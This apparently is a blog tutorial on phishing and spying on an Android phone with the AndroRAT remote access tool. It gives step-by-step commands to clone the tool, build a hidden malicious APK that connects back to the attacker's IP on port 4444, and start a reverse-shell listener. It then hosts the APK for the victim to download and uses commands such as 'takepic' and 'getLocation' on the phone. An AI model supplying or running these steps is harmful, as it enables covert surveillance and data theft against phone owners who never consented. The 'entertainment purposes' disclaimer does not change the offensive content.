There are many Hackers in this world who may be currently watching your activities daily and will try to snatch your personal information or other personal kinds of stuff from you. Well, all hackers are not bad or menaced. The hacker who does hacking with permission is known as an ethical hacker and the hacker who does hacks without permission is known as an unethical hacker.

Prerequisite

• Github installed
• Python3 installed
• Pip Installed
• Java installed
• Your Machine IP address
• Linux

Let's start our Hacking

We will be using a hacking method which is phishing for our today's Blog. You can learn more about phishing on the Wikipedia. The tool which we will be using is AndroRat.

AndroRAT is a tool designed to give the control of the android system remotely and retrieve information from it. Androrat is a client/server application developed in Java Android for the client-side and the Server is in Python. A Simple android remote administration tool using sockets. It uses java on the client-side and python on the server-side

• Clone the repository given below.

By Https

git clone https://github.com/karma9874/AndroRAT.git

By Ssh

git clone git@github.com:karma9874/AndroRAT.git

Go to the directory where you have cloned the repository by cd command.

cd <Directory_name>AndroRat

In our AndroRat folder, there are 9 sub-folders in it and we will be working with .py extension file.

Moving Further, Now we have to install some requirements for our installation by pip By using the pip command, We can install python package libraries with a single click.

Installing Requirements

pip install -r requirements.txt

We have satisfied our requirements for our system

We can also check what requirements are needed by typing the given command

cat requirements.txt

Building a malicious apk file for spying

We will be building a malicious apk file which is needed to be installed on the target phone and the good thing is that after installing this apk, your apk file gets hidden and no one can see this file. Cool, right?

let's Build this malicious file

for building this apk you need to type the command given below

python3 androRat.py --build -i <ip_address> -p 4444 -o <apk_name>.apk

** Explanation of the Above code

• androRat.py - Our cloned directories's file

• --build - for building our apk file

-i - Ip address of your system and in case you don't know the ip address of your system then type the below command.

ifconfig If you don't know where is ip address of your machine is written in ifconfig given output then you should search for 192 prefixed numbers in your ifconfig output.

• -p - port number

• -o output file

output should look like the image given below.

Now its time to host the listener

All you got to do is to write the code given below

python3 androRAT.py --shell -i 0.0.0.0 -p 4444

• Now jump back into another terminal, type another command to start the apache webserver

sudo systemctl status apache2.service

• Now, let's copy our file and send it to the web by typing the following command

sudo cp piyush.apk /var/www/html/

• Now, type the following in the target mobile and it should download your apk

<ip_address>/piyush.apk

• After downloading the apk file, Install it and open it to accept all permissions, and its game over !!!!!!!!!!!

• When you take the look at the listener you will get this interface.

• Now, Type 'help' and hit the enter. You will get the commands and you can do the following things.

For example, if you want to take a picture of the target mobile then type 'takepic' command. If or want to get their location then type 'getLocation' command.

This Blog was for Entertainment purposes, don't try to do anything unethical with it because you are always responsible for your actions.

To anonymous, don't try to hack-in by my IP address, I have already changed it.

See you in the next one. Bye, Bye.